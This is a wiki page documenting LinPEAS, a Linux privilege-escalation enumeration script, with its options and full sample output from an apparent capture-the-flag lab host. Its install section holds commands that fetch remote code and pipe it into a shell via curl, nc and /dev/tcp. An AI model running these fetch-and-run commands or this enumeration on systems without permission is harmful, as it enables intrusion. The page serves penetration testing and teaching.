LinPEAS

From aldeid

Description

LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix* hosts.

Installation

From github

$ curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

Local network

$ python -m SimpleHTTPServer 80
$ curl 10.10.10.10/linpeas.sh | sh

Without curl

$ nc -q 5 -lvnp 80 < linpeas.sh
$ cat < /dev/tcp/10.10.10.10/80 | sh

Output to file

$ linpeas -a > /dev/shm/linpeas.txt
$ less -r /dev/shm/linpeas.txt

Options

-h
To show this message
-q
Do not show banner
-a
All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly
-s
SuperFast (don't check some time consuming checks) - Stealth mode
-w
Wait execution between big blocks
-n
Do not export env variables related with history
-o
Only execute selected checks (SysI, Devs, AvaSof, ProCronSrvcs, Net, UsrI, SofI, IntFiles). Select a comma separated list.
-d <IP/NETMASK>
Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
-p <PORT(s)> -d <IP/NETMASK>
Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
-i <IP> [-p <PORT(s)>]
Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
Notice that if you select some network action, no PE check will be performed

Example

$ ./linpeas.sh -a | tee linepeas.txt


                     ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄▄
      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄
  ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄
  ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
  ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
  ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
  ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
  ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
  ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
  ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
  ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
  ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
  ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
  ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
   ▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄
        ▄▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄ 
             ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
    linpeas v2.5.0 by carlospolop

ADVISORY: linpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 99% a PE vector
  RED: You must take a look at it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMangeta: Your username


====================================( Basic information )=====================================
OS: Linux version 4.4.0-119-generic ([email protected]) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
User & Groups: uid=1001(jan) gid=1001(jan) groups=1001(jan)
Hostname: basic2
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)


====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.4.0-119-generic ([email protected]) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
Distributor ID:	Ubuntu
Description:	Ubuntu 16.04.4 LTS
Release:	16.04
Codename:	xenial

[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.16

[+] PATH
[i] Any writable folder in original PATH? (a new completed path will be exported)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

[+] Date
Thu Apr 30 04:22:33 EDT 2020

[+] System stats
Filesystem      Size  Used Avail Use% Mounted on
udev            224M     0  224M   0% /dev
tmpfs            49M  3.3M   46M   7% /run
/dev/xvda1       14G  2.4G   11G  19% /
tmpfs           244M  4.0K  244M   1% /dev/shm
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           244M     0  244M   0% /sys/fs/cgroup
tmpfs            49M     0   49M   0% /run/user/1001
              total        used        free      shared  buff/cache   available
Mem:         498068      103444      160196        1712      234428      353216
Swap:       1045500      145340      900160

[+] Environment
[i] Any private information inside environment variables?
HISTFILESIZE=0
MAIL=/var/mail/jan
SSH_CLIENT=10.9.35.106 51288 22
USER=jan
SHLVL=1
HOME=/home/jan
SSH_TTY=/dev/pts/0
LOGNAME=jan
_=./linpeas.sh
XDG_SESSION_ID=3
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=10.9.35.106 51288 10.10.226.157 22
HISTFILE=/dev/null

[+] Looking for Signature verification failed in dmseg
 Not Found

[+] selinux enabled? .............. sestatus Not Found
[+] Printer? ...................... lpstat Not Found
[+] Is this a container? .......... No
[+] Is ASLR enabled? .............. Yes

=========================================( Devices )==========================================
[+] Any sd* disk in /dev? (limit 20)

[+] Unmounted file-system?
[i] Check if you can mount umounted devices
UUID=cdbcec40-cb66-49dd-ad6b-be757c8140cf	/	ext4	errors=remount-ro	0 1
UUID=db3bdca8-5517-4600-b896-e8479e05e44a	none	swap	sw	0 0


====================================( Available Software )====================================
[+] Useful software
/bin/nc
/bin/netcat
/bin/nc.traditional
/usr/bin/wget
/usr/bin/curl
/bin/ping
/usr/bin/base64
/usr/bin/python
/usr/bin/python2
/usr/bin/python3
/usr/bin/python2.7
/usr/bin/perl
/usr/bin/sudo

[+] Installed Compiler
/usr/share/gcc-5


================================( Processes, Cron, Services & Timers )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
daemon     849  0.0  0.3  26044  1956 ?        Ss   02:35   0:00 /usr/sbin/atd -f
jan      14284  0.0  0.4   4704  2052 pts/0    S+   04:22   0:00 /bin/sh ./linpeas.sh -a
jan      14285  0.0  0.1   7296   668 pts/0    S+   04:22   0:00 tee linepeas.txt
jan      14477  0.0  0.6  37364  3280 pts/0    R+   04:22   0:00 ps aux
jan      14479  0.0  0.1  15808   772 pts/0    S+   04:22   0:00 sort
jan       2266  0.0  0.6  45276  3028 ?        Ss   04:16   0:00 /lib/systemd/systemd --user
jan       2269  0.0  0.3  61540  1664 ?        S    04:16   0:00 (sd-pam)
jan       2301  0.0  0.7  92832  3620 ?        S    04:16   0:00 sshd: jan@pts/0
jan       2302  0.0  1.0  22572  5088 pts/0    Ss   04:16   0:00 -bash
message+   824  0.0  0.7  42952  3560 ?        Ss   02:35   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root      1012  0.0  0.0   5220   116 ?        Ss   02:36   0:00 /sbin/iscsid
root      1013  0.0  0.7   5720  3516 ?        S<Ls 02:36   0:00 /sbin/iscsid
root         1  0.2  0.8  38088  4416 ?        Ss   02:35   0:18 /sbin/init
root      1110  0.0  0.3  15936  1568 tty1     Ss+  02:36   0:00 /sbin/agetty --noclear tty1 linux
root      1111  0.0  0.3  15752  1952 ttyS0    Ss+  02:36   0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root      1142  0.0  0.7  71584  3592 ?        Ss   02:36   0:00 /usr/sbin/apache2 -k start
root      1224  0.0  0.7 240008  3932 ?        Ss   02:36   0:00 /usr/sbin/nmbd -D
root       356  0.0  0.6  27704  3000 ?        Ss   02:35   0:01 /lib/systemd/systemd-journald
root       395  0.0  0.2  94772  1272 ?        Ss   02:35   0:00 /sbin/lvmetad -f
root       411  0.0  0.7  44696  3612 ?        Ss   02:35   0:02 /lib/systemd/systemd-udevd
root       811  0.0  0.6  28620  3012 ?        Ss   02:35   0:00 /lib/systemd/systemd-logind
root       814  0.0  0.5  29008  2692 ?        Ss   02:35   0:00 /usr/sbin/cron -f
root       830  0.0  0.8 275896  4252 ?        Ssl  02:35   0:00 /usr/lib/accountsservice/accounts-daemon
root       837  0.0  2.0 277936 10024 ?        Ssl  02:35   0:00 /usr/lib/snapd/snapd
root       841  0.0  0.5 636820  2724 ?        Ssl  02:35   0:04 /usr/bin/lxcfs /var/lib/lxcfs/
root       846  0.0  0.1   4396   812 ?        Ss   02:35   0:00 /usr/sbin/acpid
root       872  0.0  0.7 277176  3956 ?        Ssl  02:35   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       873  0.0  0.0  13372   144 ?        Ss   02:35   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root       890  0.0  1.1 337920  5668 ?        Ss   02:36   0:00 /usr/sbin/smbd -D
root       902  0.0  0.7 329804  3628 ?        S    02:36   0:00 /usr/sbin/smbd -D
root       921  0.0  0.5  16124  2496 ?        Ss   02:36   0:00 /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root       961  0.0  0.8 337920  4072 ?        S    02:36   0:00 /usr/sbin/smbd -D
root       981  0.0  0.8  65508  4224 ?        Ss   02:36   0:00 /usr/sbin/sshd -D
syslog     851  0.0  0.5 256392  2756 ?        Ssl  02:35   0:00 /usr/sbin/rsyslogd -n
systemd+   493  0.0  0.4 100324  2268 ?        Ssl  02:35   0:00 /lib/systemd/systemd-timesyncd
tomcat9    994  2.1  9.5 2539580 47444 ?       Sl   02:36   2:18 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat-latest/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dfile.encoding=UTF-8 -Dnet.sf.ehcache.skipUpdateCheck=true -XX:+UseConcMarkSweepGC -XX:+CMSClassUnloadingEnabled -XX:+UseParNewGC -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512m -Xmx512m -Dignore.endorsed.dirs= -classpath /opt/tomcat-latest/bin/bootstrap.jar:/opt/tomcat-latest/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat-latest -Dcatalina.home=/opt/tomcat-latest -Djava.io.tmpdir=/opt/tomcat-latest/temp org.apache.catalina.startup.Bootstrap start
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
www-data  1145  0.0  0.8 820212  4132 ?        Sl   02:36   0:02 /usr/sbin/apache2 -k start
www-data  1146  0.0  0.7 623628  3896 ?        Sl   02:36   0:02 /usr/sbin/apache2 -k start

[+] Binary processes permissions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
   0 lrwxrwxrwx 1 root root    4 Apr 17  2018 /bin/sh -> dash
1.6M -rwxr-xr-x 1 root root 1.6M Mar  8  2018 /lib/systemd/systemd
320K -rwxr-xr-x 1 root root 319K Mar  8  2018 /lib/systemd/systemd-journald
608K -rwxr-xr-x 1 root root 605K Mar  8  2018 /lib/systemd/systemd-logind
140K -rwxr-xr-x 1 root root 139K Mar  8  2018 /lib/systemd/systemd-timesyncd
444K -rwxr-xr-x 1 root root 443K Mar  8  2018 /lib/systemd/systemd-udevd
 44K -rwxr-xr-x 1 root root  44K Nov 30  2017 /sbin/agetty
476K -rwxr-xr-x 1 root root 476K Mar  5  2018 /sbin/dhclient
   0 lrwxrwxrwx 1 root root   20 Mar  8  2018 /sbin/init -> /lib/systemd/systemd
768K -rwxr-xr-x 1 root root 766K Jul 26  2017 /sbin/iscsid
 52K -rwxr-xr-x 1 root root  51K Apr 16  2016 /sbin/lvmetad
504K -rwxr-xr-x 1 root root 502K Nov  8  2017 /sbin/mdadm
220K -rwxr-xr-x 1 root root 219K Jan 12  2017 /usr/bin/dbus-daemon
 20K -rwxr-xr-x 1 root root  19K Nov  8  2017 /usr/bin/lxcfs
164K -rwxr-xr-x 1 root root 162K Nov  3  2016 /usr/lib/accountsservice/accounts-daemon
   0 lrwxrwxrwx 1 root root   15 Mar 14  2018 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -> ../jre/bin/java
 16K -rwxr-xr-x 1 root root  15K Jan 17  2016 /usr/lib/policykit-1/polkitd
 21M -rwxr-xr-x 1 root root  21M Nov 30  2017 /usr/lib/snapd/snapd
 48K -rwxr-xr-x 1 root root  47K Apr  8  2016 /usr/sbin/acpid
648K -rwxr-xr-x 1 root root 647K Sep 18  2017 /usr/sbin/apache2
 28K -rwxr-xr-x 1 root root  27K Jan 14  2016 /usr/sbin/atd
 44K -rwxr-xr-x 1 root root  44K Apr  5  2016 /usr/sbin/cron
244K -rwxr-xr-x 1 root root 243K Mar  7  2018 /usr/sbin/nmbd
588K -rwxr-xr-x 1 root root 586K Apr  5  2016 /usr/sbin/rsyslogd
 72K -rwxr-xr-x 1 root root  71K Mar  7  2018 /usr/sbin/smbd
776K -rwxr-xr-x 1 root root 773K Jan 18  2018 /usr/sbin/sshd

[+] Different processes executed during 1 min (interesting is low number of repetitions)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs

[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
-rw-r--r-- 1 root root  722 Apr  5  2016 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Apr 17  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rw-r--r--  1 root root  589 Jul 16  2014 mdadm
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  190 Apr 17  2018 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x  2 root root 4096 Apr 19  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rwxr-xr-x  1 root root  539 Apr  5  2016 apache2
-rwxr-xr-x  1 root root  376 Mar 31  2016 apport
-rwxr-xr-x  1 root root 1474 Jun 19  2017 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x  1 root root  372 May  6  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x  1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 12  2015 passwd
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x  1 root root  383 Mar  7  2016 samba
-rwxr-xr-x  1 root root  214 May 24  2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Apr 17  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Apr 17  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Apr 17  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root  211 May 24  2016 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin


[+] Services
[i] Search for outdated versions
 [ + ]  acpid
 [ + ]  apache-htcacheclean
 [ + ]  apache2
 [ + ]  apparmor
 [ + ]  apport
 [ + ]  atd
 [ - ]  bootmisc.sh
 [ - ]  checkfs.sh
 [ - ]  checkroot-bootclean.sh
 [ - ]  checkroot.sh
 [ + ]  console-setup
 [ + ]  cron
 [ - ]  cryptdisks
 [ - ]  cryptdisks-early
 [ + ]  dbus
 [ + ]  grub-common
 [ - ]  hostname.sh
 [ - ]  hwclock.sh
 [ + ]  irqbalance
 [ + ]  iscsid
 [ + ]  keyboard-setup
 [ - ]  killprocs
 [ + ]  kmod
 [ - ]  lvm2
 [ + ]  lvm2-lvmetad
 [ + ]  lvm2-lvmpolld
 [ + ]  lxcfs
 [ - ]  lxd
 [ + ]  mdadm
 [ - ]  mdadm-waitidle
 [ - ]  mountall-bootclean.sh
 [ - ]  mountall.sh
 [ - ]  mountdevsubfs.sh
 [ - ]  mountkernfs.sh
 [ - ]  mountnfs-bootclean.sh
 [ - ]  mountnfs.sh
 [ + ]  networking
 [ + ]  nmbd
 [ + ]  ondemand
 [ + ]  open-iscsi
 [ - ]  open-vm-tools
 [ - ]  plymouth
 [ - ]  plymouth-log
 [ + ]  procps
 [ + ]  rc.local
 [ + ]  resolvconf
 [ - ]  rsync
 [ + ]  rsyslog
 [ + ]  samba
 [ + ]  samba-ad-dc
 [ - ]  screen-cleanup
 [ - ]  sendsigs
 [ + ]  smbd
 [ + ]  ssh
 [ + ]  udev
 [ + ]  ufw
 [ - ]  umountfs
 [ - ]  umountnfs.sh
 [ - ]  umountroot
 [ + ]  unattended-upgrades
 [ + ]  urandom
 [ - ]  uuidd
 [ - ]  x11-common

[+] System timers
NEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Thu 2020-04-30 06:08:42 EDT  1h 44min left Thu 2020-04-30 02:35:53 EDT  1h 47min ago apt-daily-upgrade.timer      apt-daily-upgrade.service
Thu 2020-04-30 16:05:00 EDT  11h left      Thu 2020-04-30 02:35:53 EDT  1h 47min ago apt-daily.timer              apt-daily.service
Fri 2020-05-01 02:50:42 EDT  22h left      Thu 2020-04-30 02:50:42 EDT  1h 33min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2020-05-04 01:14:13 EDT  3 days left   Thu 2020-04-30 03:38:42 EDT  45min ago    snapd.refresh.timer          snapd.refresh.service
n/a                          n/a           n/a                          n/a          snapd.snap-repair.timer      snapd.snap-repair.service
n/a                          n/a           n/a                          n/a          ureadahead-stop.timer        ureadahead-stop.service


===================================( Network Information )====================================
[+] Hostname, hosts and DNS
basic2
127.0.0.1	localhost
127.0.1.1	basic2

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 10.0.0.2
search eu-west-1.compute.internal

[+] Content of /etc/inetd.conf & /etc/xinetd.conf
/etc/inetd.conf Not Found

[+] Networks and neighbours
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0      Link encap:Ethernet  HWaddr 02:c0:e9:ff:bc:ac  
          inet addr:10.10.226.157  Bcast:10.10.255.255  Mask:255.255.0.0
          inet6 addr: fe80::c0:e9ff:feff:bcac/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:9001  Metric:1
          RX packets:110790 errors:0 dropped:0 overruns:0 frame:0
          TX packets:107628 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:10296501 (10.2 MB)  TX bytes:19616371 (19.6 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:228 errors:0 dropped:0 overruns:0 frame:0
          TX packets:228 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:16416 (16.4 KB)  TX bytes:16416 (16.4 KB)

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         ip-10-10-0-1.eu 0.0.0.0         UG    0      0        0 eth0
10.10.0.0       *               255.255.0.0     U     0      0        0 eth0

[+] Iptables rules
iptables rules Not Found

[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -               
tcp        0   3828 10.10.226.157:22        10.9.35.106:51288       ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::445                  :::*                    LISTEN      -               
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      -               
tcp6       0      0 :::8009                 :::*                    LISTEN      -               
tcp6       0      0 :::139                  :::*                    LISTEN      -               
tcp6       0      0 :::8080                 :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
udp        0      0 10.10.255.255:137       0.0.0.0:*                           -               
udp        0      0 10.10.226.157:137       0.0.0.0:*                           -               
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -               
udp        0      0 10.10.255.255:138       0.0.0.0:*                           -               
udp        0      0 10.10.226.157:138       0.0.0.0:*                           -               
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -               
udp        0      0 0.0.0.0:50228           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               

[+] Can I sniff with tcpdump?
No


====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
uid=1001(jan) gid=1001(jan) groups=1001(jan)

[+] Do I have PGP keys?
gpg Not Found

[+] Clipboard or highlighted text?
xsel and xclip Not Found

[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands

[+] Checking /etc/doas.conf
/etc/doas.conf Not Found

[+] Checking Pkexec policy

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

[+] Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds
It's not possible to brute-force su.

[+] Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!

[+] Superusers
root:x:0:0:root:/root:/bin/bash

[+] Users with console
jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
root:x:0:0:root:/root:/bin/bash

[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(kay) gid=1000(kay) groups=1000(kay),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
uid=1001(jan) gid=1001(jan) groups=1001(jan)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=999(tomcat9) gid=999(tomcat9) groups=999(tomcat9)
uid=9(news) gid=9(news) groups=9(news)

[+] Login now
 04:23:46 up  1:48,  1 user,  load average: 0.29, 0.24, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jan      pts/0    10.9.35.106      04:16    1:14   0.24s  0.00s w

[+] Last logons
kay      tty1                          Wed Apr 18 09:20 - down   (00:05)
reboot   system boot  4.4.0-119-generi Tue Apr 17 13:45 - 09:25  (19:39)
kay      tty1                          Wed Apr 18 09:02 - crash  (-19:-16)
reboot   system boot  4.4.0-119-generi Tue Apr 17 13:27 - 09:25  (19:58)
kay      tty1                          Tue Apr 17 13:21 - crash  (00:05)
reboot   system boot  4.4.0-119-generi Tue Apr 17 13:14 - 09:25  (20:10)
kay      tty1                          Tue Apr 17 13:05 - down   (00:08)
reboot   system boot  4.4.0-87-generic Tue Apr 17 13:00 - 13:14  (00:14)

wtmp begins Tue Apr 17 13:00:02 2018

[+] Last time logon each user
Username         Port     From             Latest
kay              pts/0    192.168.56.102   Mon Apr 23 16:04:07 -0400 2018
jan              pts/0    10.9.35.106      Thu Apr 30 04:16:21 -0400 2020

[+] Password policy
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


Caching directories . . . . . . . . . . . . . . . DONE
===================================( Software Information )===================================
[+] MySQL version
mysql Not Found

[+] MySQL connection using default root/root ........... No
[+] MySQL connection using root/toor ................... No
[+] MySQL connection using root/NOPASS ................. No
[+] Looking for mysql credentials and exec
 Not Found

[+] PostgreSQL version and pgadmin credentials
 Not Found

[+] PostgreSQL connection to template0 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template1 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template0 using pgsql/NOPASS ........... No
[+] PostgreSQL connection to template1 using pgsql/NOPASS ........... No

[+] Apache server info
Version: Server version: Apache/2.4.18 (Ubuntu)
Server built:   2017-09-18T15:09:02

[+] Looking for PHPCookies
 Not Found

[+] Looking for Wordpress wp-config.php files
wp-config.php Not Found

[+] Looking for Tomcat users file
tomcat-users.xml Not Found

[+] Mongo information
 Not Found

[+] Looking for supervisord configuration file
supervisord.conf Not Found

[+] Looking for cesi configuration file
cesi.conf Not Found

[+] Looking for Rsyncd config file
/usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
	comment = public archive
	path = /var/www/pub
	use chroot = yes
	lock file = /var/lock/rsyncd
	read only = yes
	list = yes
	uid = nobody
	gid = nogroup
	strict modes = yes
	ignore errors = no
	ignore nonreadable = yes
	transfer logging = no
	timeout = 600
